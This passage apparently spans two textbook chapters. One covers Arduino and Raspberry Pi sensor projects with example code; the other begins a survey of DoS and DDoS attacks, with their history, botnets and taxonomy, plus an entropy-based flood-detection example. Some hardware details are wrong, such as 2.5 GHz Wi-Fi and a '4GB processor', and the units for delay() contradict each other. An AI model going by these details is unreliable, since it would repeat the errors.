deployment of different IoT hardware modules and their integration within
an IoT architecture to regularly fetch all the desired updates on our
local (app) and centralized server.


8.3 Component Description


The hardware devices which can be integrated with the IoT infrastruc- 
ture are found in abundance. The most prominent ones in the market 
are Arduino and Raspberry Pi. While Arduino is used for completion of 
smaller and repetitive tasks, Raspberry Pi is used for bigger and more com- 
plicated, difficult work. It’s also called a mini computer and is a credit card- 
sized device. Below, both devices are discussed in more detail. 


8.3.1 Arduino Board UNO 


In Figure 8.1, an Arduino UNO board is shown with numbers marking its PCB
layout [1]. Of the points marked in the picture, 1 is the USB port, which
loads the code into the Arduino board; 2 is the barrel jack; 3 is the
ground point; 4 and 5 are the input voltage pins of 5V and 3.3V,
respectively.




Figure 8.1 Arduino UNO board. 

6 stands for six analog inputs (A0-A5), for example in case of input from
temperature sensor. 7-8 stands for pins numbered from 0-13, that is 14 
digital pins used for both input and output. 9 is for analog reference point. 
10 is for reset button, which erases all code on the device and is available 
for new code again. 11 shows LED ON, if Arduino is powered by a source. 
12 indicates TX and RX, which shows when our device is transmitting data 
and receiving data, respectively. 

13 shows IC (horizontal black with many legs) which stands for 
Integrated Circuit. 14 controls the amount of voltage to be let in the 
Arduino board. There are many other small parts in the Arduino board 
but those are beyond the scope of our domain. 


8.3.2 Raspberry Pi 


Another hardware device, which is depicted in the figure below, is 
Raspberry Pi. It is a small mini computer with a 4GB processor. It has a 
conventional Wi-Fi, Micro SD card, USB port [9] and GPIO with camera 
ports too. It is also used for connecting sensors data with cloud technology. 

In Figure 8.2, the Raspberry Pi 4 components description is provided 
[2]. The Broadcom CPU handles all computations and GPU handles all 
graphical output. The LPDDR is Low Power Double Data Rate, specially 
for mobile computers. The frequency is 1.5 GHz and RAM is 4 GB. The 
USB ports are used to connect it to laptop or other source. An Ethernet 
port is used for internet. A video port is also available at the bottom side 
next to a camera port. Next to that are HDMI ports for high-definition 
networking. A 5V power input is also provided. 


[Figure 8.2 labels: extended 40-pin GPIO header (additional 4x UARTs,
4x SPI, 4x I2C); Broadcom BCM2711B0, 1.5GHz 64-bit quad-core Cortex A72
processor; LPDDR4 SDRAM (1GB, 2GB, 4GB); dual-band WiFi (2.5GHz & 5GHz),
IEEE 802.11.b/g/n/ac and Bluetooth 5.0 (BLE); Ethernet controller; DSI
display port; 2x USB 3.0 ports; micro SD port for OS & storage (back
side); USB controller; 2x USB 2.0 ports; 5V@3A USB-C power input; 4-pole
stereo output and composite video port; dual micro-HDMI ports (single
4K60fps, dual 4K30fps); CSI camera port.]

Figure 8.2 Raspberry Pi 4 board. 

A micro-SD port for the OS and also storage is shown. Two-band Wi-Fi at
2.5 GHz and 5 GHz, along with a BLE (Bluetooth Low Energy) technology
port, is shown. GPIO stands for General Purpose Input Output port. The
processor is a 64-bit quad-core Cortex A72 processor. The kind of
experimental setup that can be achieved using these two components will
be discussed below.


8.4 Case Studies 


Sensor data is used in many applications, as explained in the sections
below. A few sensors, their working, connections, code and output are
briefly described.


8.4.1 Ultrasonic Sensor 


There are many varieties of sensors used to measure physical attributes.
One such sensor is the ultrasonic sensor. It sends ultrasonic sound waves,
which hit any hard surface and are reflected back; the sensor gathers the
reflection as an electrical signal. Their range is 40-70 kHz.

Here, in this experiment, the distance between two points is measured
using an ultrasonic sensor. The logic behind this is that the
(high-frequency) sound waves are emitted from the source/emitter, hit the
nearest straight obstacle and then return. The time taken by the waves can
be noted, and the speed of the waves (330 m/s) is known beforehand. So,
putting both into the formula Distance = Speed × Time gives the distance.

One thing to note is that the distance travelled here is double, as the
waves hit the obstacle and then come back too. So, finally, it should be
divided by two to get the actual distance. This can be worked out by
downloading and installing the Arduino IDE on our personal system, then
opening and running it. The hardware needed is an Arduino UNO, breadboard,
jumper wires, USB connector, personal system, and ultrasonic sensor.

On the breadboard, connect the ultrasonic sensor with jumper wires (the
breadboard has vertical connections in between). For the pins on the back
side of the sensor: VCC should be connected to 5V on the Arduino board,
Trig to digital pin 13 of the Arduino, Echo to digital pin 12 of the
Arduino, and Gnd to Gnd of the Arduino board. Connect the USB from the
laptop to the Arduino as shown in Figure 8.3.

Once it is connected, the code [1] should be run from an Arduino sketch
(the code-writing area). Verify the code in the Arduino IDE, then upload
it from the sketch. After connecting everything, press Ctrl + Shift + M to
see the output window.


Figure 8.3 Connections of ultrasonic sensor for measuring distance.

Figure 8.4 Distance readings.

So, here from Figure 8.4, it can be inferred that, in the output, the first 
distance is in inches and the second one is the equivalent cm; it shows the 
nearest straight obstacle’s distance from the sensor on the Arduino board. 


8.4.2 Temperature and Humidity Sensor 


In applications where weather monitoring is done using IoT devices,
different sensors are required. Sensors like the DHT11, which measures
temperature and humidity, are deployed at nodes; they capture the
environmental conditions remotely and send data to the cloud or server
regularly. Here, in this experiment, two environment parameters are
measured, namely temperature and humidity. Following the same procedure
that was followed for measuring distance in the Arduino IDE, it can be set
up, and the code below measures temperature and humidity values.

Please note that it is a safe process to explicitly download the DHT 
library in IDE. DHT is the sensor name for measuring the environment 
parameters. 


Figure 8.5 Connections for measuring temperature and humidity. 

Humidity (%): 53.00
Temperature (C): 33.00

Figure 8.6 Output measurements in Arduino IDE. 


The connections are mentioned in Figure 8.5. Code [2] is mentioned in 
annexures. In [2] code, delay of 2000 is in microsecond; it can be modified 
to set the frequency of measurement. 9600 is the baud frequency (default). 

Here, in Figure 8.6, temperature and humidity are being measured, both 
of which values are shown. For example, 53 is humidity (%) and 33 is deg 
C. 

Similarly, many projects can be done using Arduino board, for example, 
soil moisture measurements of a plant, opening and closing the door of our 
garage or LED glowing in case of intrusion detection in our home/office. 
But generally repetitive tasks are preferred in Arduino and also much less 
computational task is performed. It is notable that internet connectivity is 
not used in the above tasks. On the other hand, let us see what work our 
Raspberry Pi can perform as compared to Arduino. 


8.4.3 Weather Monitoring System Using Raspberry Pi 


Weather nowadays has become most unpredictable as there have been a 
myriad of ecological imbalances in nature. From deforestation to pollution 
to soil erosion, humans have changed the environment according to their 
material needs. 

This in turn has resulted in the sporadic increase of natural calamities
over the years. So, in planning to monitor the environmental imbalances
which are about to occur, it is hoped that human lives can be saved by
predicting potential disasters beforehand.

Figure 8.7 Working diagram of weather monitoring.

In Figure 8.7 [8], Raspbian OS is used with Linux OS. The Raspbian OS can
be installed on the Raspberry Pi from an SD card. Python will be used to
code on the device. Temperature, humidity, pressure, light intensity and
level sensors are connected; these parameters are used to monitor the
environment, and the measurements are sent to the cloud via the internet
(Wi-Fi), after which the data can be uploaded to any server as desired.
Apps used by disaster management teams can also be notified, as can the
GPS location of the place.

In Figure 8.8 below, a flow chart is depicted where, on top, all the data 
is collected from the sensors, then it is sent to Raspberry Pi processor and 
that particular data is stored in CSV file at server. Now for analytics, this 
data can be sent to either apps, website, govt disaster relief team, etc. REST 
(Representational State Transfer) architectural principles are used to com- 
municate with HTTP (Hypertext transfer protocol). 
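
The flow described above (readings leave the Raspberry Pi, reach a server and are stored in a CSV file) is shown below with the checks a server can apply before it stores a reading. This is an added example, not code from the chapter; the HMAC scheme, field names, key, freshness window and value bounds are assumptions, and message bodies are passed in-process as they would arrive in an HTTP POST.

```python
import csv
import hashlib
import hmac
import io
import json

# Constructed per-node key; in practice each node gets its own random key.
DEVICE_KEYS = {"pi-node-01": b"constructed-demo-key-0001"}
MAX_SKEW_S = 300  # assumed freshness window, in seconds
# Assumed plausibility bounds; tune to the sensors actually fitted.
BOUNDS = {
    "temperature_c": (-40.0, 60.0),
    "humidity_pct": (0.0, 100.0),
    "pressure_hpa": (300.0, 1100.0),
}
FIELDS = ["device_id", "timestamp"] + list(BOUNDS)


def canonical(reading):
    """Stable byte encoding so node and server authenticate the same bytes."""
    return json.dumps(reading, sort_keys=True, separators=(",", ":")).encode()


def sign_reading(reading, key):
    """Node side: attach an HMAC-SHA256 tag to one reading."""
    tag = hmac.new(key, canonical(reading), hashlib.sha256).hexdigest()
    return json.dumps({"reading": reading, "tag": tag})


def _is_number(value):
    # bool is an int subclass; NaN is the only value that differs from itself.
    return (isinstance(value, (int, float))
            and not isinstance(value, bool) and value == value)


class Collector:
    """Server side: authenticate, validate, then append to the CSV sink."""

    def __init__(self, sink):
        self.writer = csv.DictWriter(sink, fieldnames=FIELDS)
        self.writer.writeheader()
        self.last_seen = {}  # device_id -> newest accepted timestamp

    def ingest(self, body, now):
        try:
            msg = json.loads(body)
            reading, tag = msg["reading"], msg["tag"]
            device, ts = reading["device_id"], reading["timestamp"]
        except (ValueError, KeyError, TypeError):
            return "malformed"
        key = DEVICE_KEYS.get(device) if isinstance(device, str) else None
        if key is None or not isinstance(tag, str):
            return "unknown-device"
        expected = hmac.new(key, canonical(reading), hashlib.sha256).hexdigest()
        # Constant-time comparison, done before any field is trusted.
        if not hmac.compare_digest(expected.encode(),
                                   tag.encode(errors="replace")):
            return "bad-tag"
        if not _is_number(ts) or abs(now - ts) > MAX_SKEW_S:
            return "stale"
        if ts <= self.last_seen.get(device, float("-inf")):
            return "replay"
        for field, (low, high) in BOUNDS.items():
            value = reading.get(field)
            if not _is_number(value) or not low <= value <= high:
                return "out-of-range"
        self.last_seen[device] = ts
        # Only the expected columns are written; extra keys are dropped.
        self.writer.writerow({f: reading[f] for f in FIELDS})
        return "stored"


def demo():
    """Run constructed messages through the collector; returns the outcomes."""
    key = DEVICE_KEYS["pi-node-01"]
    good = {"device_id": "pi-node-01", "timestamp": 1000,
            "temperature_c": 33.0, "humidity_pct": 53.0,
            "pressure_hpa": 1009.2}
    signed = sign_reading(good, key)
    forged = json.loads(signed)
    forged["reading"]["temperature_c"] = 10.0  # altered in transit
    faulty = dict(good, timestamp=1020, humidity_pct=140.0)
    sink = io.StringIO()
    collector = Collector(sink)
    outcomes = [
        collector.ingest(signed, now=1010),
        collector.ingest(signed, now=1010),             # same message again
        collector.ingest(json.dumps(forged), now=1010),
        collector.ingest(sign_reading(faulty, key), now=1025),
        collector.ingest("not json", now=1025),
    ]
    return outcomes, sink.getvalue().splitlines()


if __name__ == "__main__":
    print(demo())
```
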

Figure 8.8 Flow chart.


8.5 Drawbacks of Arduino and Raspberry Pi


Both Arduino and Raspberry Pi have several advantages compared to 
other conventional methods. Some interesting comparisons can be made 
between them. 

Arduino is a small microcontroller, the size of an ATM card. It can do
many small tasks without the need of an OS. It simply writes the code and 
executes it as its firmware interprets it. It is generally preferred for hardware 
projects and used where monitoring the readings without much execution 
part or a very small, less computational task is to be followed. Generally, an 
Arduino board is used for simple loopy tasks such as opening and closing 
a house door, gathering the outside temperature data or driving a simple 
motor, etc. 

While Arduino can be turned ON and OFF at any point of time without 
any risk or damage, when the power resumes, the code is run again. A bat- 
tery pack will suffice Arduino. It is cheaper than Raspberry Pi, as Arduino 
costs around $10-20 depending on the version [5]. For example, if a bulb 
needs to be ON, then Arduino is best suited, otherwise let us suppose tens 
of bulbs be ON with some condition, then Raspberry Pi will hold aces. 
Arduino cannot be connected to the internet on its own. If we still want
to do so, it takes some fiddly work, as external boards called “Shields”
need to be plugged in, with proper code to handle them, to make Arduino
as functional as Pi.

Raspberry Pi, on the other hand, is bigger in size compared to its former
counterpart. Also, there is Raspbian OS on the SD card inside it. It has
a CPU and a GPU too. Computationally, it is more intensive. It has a
Wi-Fi/BLE port also. Raspberry Pi is best used for cumbersome tasks such
as driving a robot, performing multiple tasks, or doing encryption
calculations. Pi is hard to run on batteries. The price of Raspberry Pi
is around $35-40 [4].

Pi can do parallel tasks like a computer does multi-tasking. For build- 
ing a complex project, Raspberry Pi is the best choice. It runs on an OS 
and must be properly shut down before turning OFF the power, otherwise 
OS and applications may get corrupt and can be damaged. Raspberry Pi 
is almost 40 times faster than Arduino. Pi has an Ethernet port, for con- 
nection to the networks. Also, internet can easily be run on Pi using USB 
Wi-Fi dongles. 


8.6 Challenges in IoT 


Owing to the vastness of the IoT domain, there ought to be many challenges
involved like Design challenges, Security challenges and Development 
challenges. These challenges can become a bottleneck for future work 
capabilities in this domain. Some of the prominent challenges occurring 
in IoT are listed below. 


8.6.1 Design Challenges 


The design challenges [11] generally involve deploying IoT products in
unstable network areas, for example, areas with poor GSM/GPRS signals.
Sometimes the environment adds to the woes. The power consumption of the
sensor nodes in the architecture should be minimal, owing to the size of
the service area and the unavailability of charging areas, so devices
should be made with minimal power consumption or perhaps be charged with
solar power. A proper strategy for choosing NVM (Non-Volatile Memory)
should be made, as during network failure the internal NVM stores the
critical data. A secondary partition for failover handling can be made
for those critical times.


8.6.2 Security Challenges


Security challenges are the most important challenges of all [10].
Insufficient testing and non-modification of IoT products before they are
launched in the market is the gravest concern affecting security. In the
mad race to make fast money, many big companies ignore these security
loopholes.

Brute force attack, Default passwords, IoT malware and ransomware 
are a few other security challenges [10]. Due to so many different layers 
of authorization and authentication involved, the privacy of the users is 
jeopardized. 


8.6.3 Development Challenges 


Some newbie enterprises don't have an exact idea of IoT infrastructure and 
thus try to get into this domain before getting any design or test, creat- 
ing implementation issues [10]. Data miners, experts and analysts are also 
required at the end IoT level 6 and 7 where a final report has to be created 
out of the raw data from sensors. So knowledge of specialized technologies 
and manpower is a big requirement in this IoT technology.


8.7 Conclusion


As a result of the enormous growth of IoT, it has become a highly capable 
technology that can cause gigantic developments in the technology field. 
Moreover, it’s a high probability that IoT will be the go-to technology in the 
near future. Edge computing technology has also been looked at. The
sensors cannot all send all of their data to the cloud, as it would be too
much to handle, and this is where edge computing comes into the picture.
The technology performs the important computations at the sensor nodes and
sends only the required data further to the cloud, thus reducing the load
on the cloud. However,
it too has limitations and so, in future a mixture of edge computing and 
blockchain would be inevitable for the growth of IoT. 

IoT technology has been the most upcoming and talked about of the 
promising technologies for the future. There has been lots of research in 
the ongoing domain. Communication has become indispensable for the 
prosperity of human beings, so this technology enhances it. Imagine our 
car talking to us or communicating with other vehicles in the vicinity, or 
our jug in the refrigerator alerting us that milk is about to run out soon. 
These are a few examples of areas where IoT can do wonders. As more and 
more things are getting involved with IoT, obviously the security, privacy, 
and availability of data remains an issue. The applications of IoT range from
smart homes, future agriculture farming, smart city, healthcare, industrial 
automation and much more. When many technologies or architectures 
meet to benefit a common cause, accountability is always a point to pon- 
der. Likewise, future insights can be provided by Blockchain regarding the 
accountability issues, and maybe these two can provide a better and more 
robust system for future generations. Blockchain can settle the privacy and 
reliability concerns in IoT. 


8.8 Annexures 


1

// Ultrasonic distance measurement: Trig on pin 13, Echo on pin 12.
const int trigPin = 13;
const int echoPin = 12;

void setup() {
  Serial.begin(9600);  // serial monitor at 9600 baud
}

void loop() {
  long duration, inches, cm;

  // Send a 10 microsecond trigger pulse.
  pinMode(trigPin, OUTPUT);
  digitalWrite(trigPin, LOW);
  delayMicroseconds(2);
  digitalWrite(trigPin, HIGH);
  delayMicroseconds(10);
  digitalWrite(trigPin, LOW);

  // The echo pulse width is the round-trip time in microseconds.
  pinMode(echoPin, INPUT);
  duration = pulseIn(echoPin, HIGH);

  inches = microsecondsToInches(duration);
  cm = microsecondsToCentimeters(duration);
  Serial.print(inches);
  Serial.print("in, ");
  Serial.print(cm);
  Serial.print("cm");
  Serial.println();
  delay(1000);
}

long microsecondsToInches(long microseconds) {
  // About 74 microseconds per inch; halve for the one-way distance.
  return microseconds / 74 / 2;
}

long microsecondsToCentimeters(long microseconds) {
  // About 29 microseconds per centimetre; halve for the one-way distance.
  return microseconds / 29 / 2;
}




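2

#include <dht11.h>
#define DHT11PIN 4  // DHT11 data line on digital pin 4

dht11 DHT11;

void setup() {
  Serial.begin(9600);  // serial monitor at 9600 baud
}

void loop() {
  Serial.println();
  int chk = DHT11.read(DHT11PIN);  // status of the read; not checked here

  Serial.print("Humidity (%): ");
  Serial.println((float)DHT11.humidity, 2);

  Serial.print("Temperature (C):");
  Serial.println((float)DHT11.temperature, 2);

  delay(2000);  // pause before the next reading (delay() takes milliseconds)
}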


Abstract

Denial of Service (DoS) attacks are some of the most expensive and threatening 
cyberattacks that exist on the internet. Their main aim is to restrict the users/ 
victims’ access to a specific resource. This chapter comprises all ideas, classification, 
and solutions to a DoS attack. DoS compromises the availability goal of the CIA 
triad [16]. Here, DoS attacks are classified by network and attacker behavior:
for example, TCP SYN is network-based, whereas a UDP attack is bandwidth-based.
Distributed Denial of Service (DDoS) is the revamped and advanced version of 
DoS which uses multiple sources/zombies/agents to carry out the attack. Zombies/ 
Agents are the compromised computers that attackers use to attack another com- 
puter. Viruses, worms, and Botnet are the main reasons for DDoS attacks. Due to 
DoS attacks, there is a threat to major new technologies such as VANET, IoT, etc., 
which are not yet fully developed. To avoid DoS attacks users must install regular 
security patches, antivirus, and anti-trojan software and also run firewalls. Post- 
Attack Forensics is the type of countermeasure in which a pattern of the traffic of 
a previous DDoS attack is collected to identify and block the same kind of attack. 


Keywords: DoS, CIA triad, TCP SYN, UDP, zombies, VANET, IoT, post-attack 
forensics 


9.1 Introduction


The Internet is the most valuable asset in the 21st century. Every business in 
the world tries to get benefit through it. The Internet has become the power- 
house of websites, business, and communication channels, with slight dis- 
ruption of any sector causing huge inconvenience to users, owners, and 
service providers. The unavailability of Internet services leads to immense 
financial losses [2]. The disruption can be either natural like due to power 
failure or due to planned cyberattacks. Cyberattacks are attacks carried out 
with the help of computers, network devices, or both. Mostly these attacks 
are carried out to extract money and disrupt others’ business [19]. 

Denial of Service (DoS) attacks are some of the most expensive and 
threatening cyberattacks that exist on the Internet now. DoS is a type of 
attack in which the main aim is to restrict the users/victims’ access to a spe- 
cific resource [3]. It focuses on blocking and disrupting permitted access 
to a resource by restricting the system’s operation and function. DDoS is 
the modified and advanced version of DoS. Distributed Denial of Services 
(DDoS) is the same as a DoS attack but uses multiple sources/zombies/ 
agents to carry out the attack. Zombies/Agents are compromised comput- 
ers that attackers use to attack another computer. Attackers take advan- 
tage of security vulnerabilities, backdoors, viruses, worms, and more to 
compromise the computer system to create zombies. Zombies function as
nodes that follow the attacker’s commands and send a huge volume of
data and queries to websites, or send numerous spam emails to a single
email address, preventing the victim from accessing the resource or
causing service providers to suffer. DoS and DDoS compromise the
availability goal of the CIA triad.

Figure 9.1 DDoS using zombie network [13].

Due to DoS and DDoS attacks, major commercial websites such as Amazon,
eBay, CNN, Yahoo, and other websites have faced major financial losses
and inconsistent connectivity. These attacks sometimes cause a threat to
public security, as in 2003 when the Houston port system in Texas was
taken down [2].


9.1.1 Objective and Motivation 


The objective of this paper is to gain new insight into one of the most 
threatening cyberattacks, i.e., Denial of Service (DoS). Each year many
companies, personnel, and governments face huge losses in the financial 
sector and many of them lose their reputation and brand value. The study 
is carried out to discover the behavior and phenomenon of DoS attacks, 
and to accrue knowledge about their nature and how frequently these 
attacks affect the resource and power of individuals/companies/govern- 
ment. This chapter focuses on how to deal with Denial of Service (DoS) 
and Distributed Denial of Service (DDoS) attacks with the help of differ- 
ent countermeasures and defense mechanisms. The purpose of this study 
is to analyze the growth in the severity of DoS and DDoS attacks, which 
can help us to build advanced defense measures by tracking their activity 
through analyzing attackers’ previous approaches. Due to the huge wid- 
ening of Internet users, the attacker always gets a feasible way to attack 
any users, so to enable people to wake up to the risk that is presented, this 
paper gives some insight and knowledge. 

Figure 9.2 Average annual cost of cyberattack by its type (2018 costs about US$13.0
million) [4].

The study carried out by Accenture and the Ponemon Institute in 2018
found that Denial of Service is the third most expensive IT security crime 
for victim organizations [4]. 

According to more than 2,600 security and IT professionals at 355 orga- 
nizations around the world [4], DoS attacks have increased victim cost by 
nearly 10% in 2018 as compared to 2017. 

DDoS attacks also continue to grow. Here are some statistics that can 
affect the potential market forecasts for 2020 and beyond [6]: 


1. According to Cisco Visual Networking Index (VNI) - 2017 
data, DDoS assaults are projected to grow twice of 14.5 mil- 
lion by 2022 globally. 

2. The impact of dominant DDoS attacks is widespread; about 
25% of all web traffic is used when they are active. 

3. According to Kaspersky’s SecureList, China and the United
States were the most common targets for DDoS attacks in
Q2 2019, up 84% from Q1.

4. According to the A10 Network Study, the agency monitored
over 20.3 million DDoS resources in Q2 2019.


The scale of DDoS assaults has grown dramatically in recent years,
according to Arbor Network’s 12th annual report in Waterman, and these
attacks are steadily rising year by year. As Figure 9.3 shows, over the
last 10 years the volume of attacks has increased tremendously, with major
growth seen in 2016 [5].

Figure 9.3 Size of DDoS attack in Gb/s [5].


9.1.2 Symptoms and Manifestations


Symptoms of Denial-of-Service attacks, according to the U.S. Computer 
Emergency Response Team, include [8]: 


1. Network output that is unusually slow.

2. A particular web page is unavailable.

3. Unable to open any website.

4. The amount of spam messages obtained has skyrocketed
(this form of DoS is known as an email bomb).


9.2 Literature Survey 


In paper [2], among the three goals of computer security, availability 
describes the accessibility of desired resources on time. DoS attacks are 
attacks which disrupt the availability goal of internet security. The CERT 
Coordination Center describes three specific types of attacks: 1) the dis- 
ruption or modification of configuration information, 2) the use of finite, 
restricted, or nonrenewable resources, and 3) the physical disruption or 
modification of connected devices. They have looked into different DoS 
attack mechanisms and summarized a more realistic taxonomy of attack 
and also provided some comprehensive taxonomy on defense practices. 
After reviewing a huge number of research proposals, they added some new
attack classifications to the existing taxonomy of attacks, and more
could be added shortly.

In [28], the authors discuss a sequence of Denial of Service attacks 
against a victim’s computer and suggest a DoS attack mitigation algorithm. 
The requesting client passes through three layers of this algorithm for 
effective verification. The TCP 3-way handshake can be exploited by
flooding a huge number of TCP SYN requests, which results in system
crashes and unresponsive servers. Packet monitoring using the TTL approach
and anomaly detection using entropy are two approaches that are not ideal
methods for prevention but can be used. Based on retrieval time, the
suggested algorithm outperforms current algorithms in detecting legitimate
users and stopping attackers from accessing the server.

In [14], both proven and possible attack pathways are used to explain 
the attack taxonomy. Along with this definition, this research goes through 
key characteristics of each attack type, which helps to characterize the 
complexities of countering these attacks. The end-to-end approach is used 
in Internet architecture: connecting end hosts use dynamic features and 
functions to attain expected service promises. It was found that to gain
unparalleled strength and survivability, attackers collaborate to share 
attack code and knowledge about compromised computers, as well as to 
assemble their agents into organized networks. 

In [21], to detect and identify anomalous network traffic behavior, 
an advanced intrusion detection system (IDS) is needed. The method is 
assisted in this article using the most recent dataset that contains the most 
common forms of DDoS attacks, such as (HTTP flood, SIDDoS). To detect 
DoS attacks, Decision trees are utilized in conjunction with well-known 
classification approaches such as Naive Bayes, Support Vector Machine 
(SVM), and Multilayer Perceptron (MLP). Machine learning techniques 
are important for providing insight into the severity of an attack and, as a 
result, allowing businesses to take appropriate steps to minimize specific 
attacks which would permit the scope of attacks on a network link or an 
entity to be measured, allowing the network to be protected by appropriate
firewall rules.

In [26], engineering scalable security technologies designed for the IoT
environment are needed to execute safe IoT growth. The growth in IoT
has also triggered the frequency of DoS attacks as the low-end IoT devices 
do not have robust encryption mechanisms, making them vulnerable to 
attacks. Software-Defined Networking (SDN) is a hopeful model which 
would help detect and reduce Denial of Service (DoS) and Distributed 
Denial of Service (DDoS) risks in the 5G networks. A stateful Software- 
Defined Networking (SDN) protection is an approach that can be used 
to identify and minimize DoS and DDoS attacks using the principle of 
entropy as the detection mechanism. 
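
The entropy-based detection mentioned in [28] and [26] above can be illustrated as follows. This is an added example, not code from either paper; the window size, tolerance, labels and the constructed packet list are assumptions.

```python
import math
from collections import Counter

WINDOW = 50  # packets per window (assumed)

# Constructed addresses: documentation ranges for clients and attack
# sources, a private range for the servers.
CLIENTS = [f"192.0.2.{i}" for i in range(1, 11)]
SERVERS = [f"10.0.0.{i}" for i in range(1, 6)]


def normalized_entropy(values):
    """Shannon entropy of the values, scaled to 0..1 by log2(len(values))."""
    total = len(values)
    if total < 2:
        return 0.0
    counts = Counter(values)
    h = -sum((n / total) * math.log2(n / total) for n in counts.values())
    return h / math.log2(total)


def window_features(packets):
    """(source-IP entropy, destination-IP entropy) for one window."""
    return (normalized_entropy([src for src, _ in packets]),
            normalized_entropy([dst for _, dst in packets]))


def classify(features, baseline, delta):
    src, dst = features
    base_src, base_dst = baseline
    # A flood concentrates traffic on the victim, so destination entropy
    # drops well below the learned baseline.
    if dst >= base_dst - delta:
        return "normal"
    if src > base_src + delta:    # many distinct senders at once
        return "distributed-flood"
    if src < base_src - delta:    # one sender dominates the window
        return "single-source-flood"
    return "destination-concentration"


def detect(packets, window=WINDOW, training_windows=2, delta=0.2):
    """Learn a baseline from the first windows, then label the rest."""
    windows = [packets[i:i + window]
               for i in range(0, len(packets) - window + 1, window)]
    feats = [window_features(w) for w in windows]
    train = feats[:training_windows]
    if not train:
        raise ValueError("need at least one full window to learn a baseline")
    baseline = (sum(f[0] for f in train) / len(train),
                sum(f[1] for f in train) / len(train))
    return [(i, classify(f, baseline, delta))
            for i, f in enumerate(feats) if i >= training_windows]


def normal_window(n=WINDOW):
    """Constructed benign traffic: clients spread evenly over the servers."""
    return [(CLIENTS[i % 10], SERVERS[i % 5]) for i in range(n)]


def flood_window(sources, victim=SERVERS[0], n=WINDOW, background=5):
    """Constructed flood: a little benign traffic, the rest aimed at victim."""
    packets = normal_window(background)
    packets += [(sources[i % len(sources)], victim)
                for i in range(n - background)]
    return packets


def constructed_capture():
    many = [f"198.51.100.{i}" for i in range(1, 46)]
    return (normal_window() * 3 + flood_window(many)
            + normal_window() + flood_window(["203.0.113.9"]))


if __name__ == "__main__":
    for index, label in detect(constructed_capture()):
        print(index, label)
```

An entropy shift is a signal rather than a verdict: a flash crowd of legitimate users also concentrates traffic on one destination.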


9.3 Timeline of DoS and DDoS Attacks 


In 1974, 13-year-old David Dennis performed the first DoS attack. Dennis 
wrote a program that forced a few computers in a nearby college research 
lab to shut down using the “external” or “ext” command [7]. Two decades 
later, Panix, one of the oldest ISPs in the world, was the target of a DoS 
attack, according to theory. On September 6, 1996, Panix was hit by a SYN 
flooding attack, which knocked out the company’s networks for weeks 
while device manufacturers, particularly Cisco, worked out an appropriate 
defense. Khan C. Smith demonstrated a DoS attack on the Las Vegas Strip 
in 1997 at a DEF CON conference by shutting down Internet connections 
for more than an hour. Following the publication of that code, countless 
Internet attacks against EarthLink, E-Trade, Sprint, and other companies
occurred over the next few years [8]. 

DDoS is a more sophisticated and complex version of DoS attacks. In 
late 1999, comments in the code indicated that a major attack was planned 
for December 31 but fortunately never happened [9]. In 2000, the first 
recorded DDoS attacks that hit several popular internet sites, like eBay, 
CNN, E-Trade, and Yahoo, were carried out by a 15-year-old boy, Michael 
Calce, using a cover named “Mafiaboy”. Calce hacked into several uni- 
versity computer networks. He used their servers to launch a distributed 
denial-of-service (DDoS) assault. In 2016, a huge DDoS attack targeted 
Dyn, a big domain name system (DNS) vendor, knocking out prominent 
internet sites and services like GitHub, Amazon, CNN, Airbnb, Spotify, 
PayPal, Netflix, Visa, The New York Times, and Reddit [10]. 

On March 1, 2018, GitHub was struck by a 1.35 Tb/s attack. On March
5, 2018, an unidentified customer of Arbor Networks, a US-based service
provider, was hit by the biggest single DDoS attack to that point, with a
peak of around 1.7 Tb/s. In February 2020, Amazon Web Services (AWS)
was hit by an attack with a record intensity of 2.3 Tb/s. In June 2019,
during the anti-extradition riots in Hong Kong, the messaging application
Telegram was subjected to a distributed denial of service (DDoS) attack
aimed at preventing protesters from using it to coordinate their
movements [8].


9.4 Evolution of Denial of Service (DoS) & 
Distributed Denial of Service (DDoS) 


Viruses, worms, malware, spyware, and botnets are types of malicious
code designed to exploit vulnerabilities and resources. According to [1],
a Trojan horse is a script that appears to do one thing while doing
something else behind the scenes. Unlike worms and viruses, Trojans do
not spread by attacking other resources or replicating themselves; instead,
they create security holes that enable unauthorized users to gain access
to a device [11]. Just as a virus is a self-replicating program
that binds itself to executable programs, so is a worm. Robert T. Morris
revealed the first big Internet worm, the ‘88 RTM Internet Worm, in
1988 [1].

Attackers can use that script to carry out Distributed Denial of Service
attacks once they have an army of infected computers. Code Red, Code
Red II, and Sasser are worms that can infiltrate hundreds and thousands
of computers and transform them into attack targets [1]. The targeted web
addresses receive multiple requests at a time from several infected comput- 
ers leading to a denial of service. These Trojan programs infect computers 
and carry out DoS attacks called Trojan-DDoS [12]. Mytob and its various 
variants, as well as Bayfraud, Fanbot, and Bagle have all appeared recently. 
Malicious scripts have been a significant cause of discussion in big enter- 
prises because they often cause downtime. 

Even though the biggest botnet found using calculation and identification
techniques had only 20,000 servers, there have been reports of 100,000-host
zombie networks. Extortion, identity theft, and credit card fraud are
all popular uses for these armies. Leaks of hacker “Bot-Wars” expose their
strategic sophistication when they fight for possession of these valuable
items by creating scripts that eliminate their competitors before they have
the biggest army.

Due to the use of IRC networks and protocols, it is now harder to 
recognize Distributed Denial-of-Service networks, as these enable a 
valid network service to monitor a community of Distributed Denial- 
of-Service zombies through outbound connections to a standard service. 
Since these communication channels get a lot of traffic, an intrusion 
could go unnoticed. The attacker is also helped by the IRC server, which 
keeps track of which agents are available online. The intruder can access 
the IRC server, which gets this information through IRC network soft- 
ware alerts [1]. 


9.5 DDoS Attacks: A Taxonomic Classification 


To conceive a DDoS attack taxonomy, we must first classify the attacks in 
terms of their actions and properties [14]. The trait of the attack is defined 
by analyzing the methods that are used to carry out and plan the attack. In 
Figure 9.4, the DDoS attack is classified into various types according to the 
behavior of attacks, such as the impact of attacks, types of automation, the 
rate dynamics of attacks, and many more. 


9.5.1 Classification Based on Degree of Automation 


The attacker must first identify a compromised agent computer and inject it 
with malicious code to plan for the attack. We distinguish among Manual, 
Semi-Automatic, and Automatic DDoS attacks based on the degree of 
automation [15]. 

Figure 9.4 Classification of DDoS attacks by degree [15].


• Manual: The intruder manually scans remote devices for
bugs, gains access to them, downloads the attack code, and
then orders the attack to begin.

• Semi-Automatic: The DDoS network in semi-automatic
attacks is made up of handler (master) and agent (slave, daemon,
zombie) computers. Recruiting, hacking, and infecting are all
automatic processes. During the usage process, the attacker
specifies the attack type, onset, length, and target to the zombies,
which then deliver packets to the target through the
handler.

• Automatic: In an automatic DDoS attack, the attack code
pre-programs the attack’s start time, attack form, length,
and victim. Since the attacker is only involved in issuing
a single instruction at the outset of the procurement process,
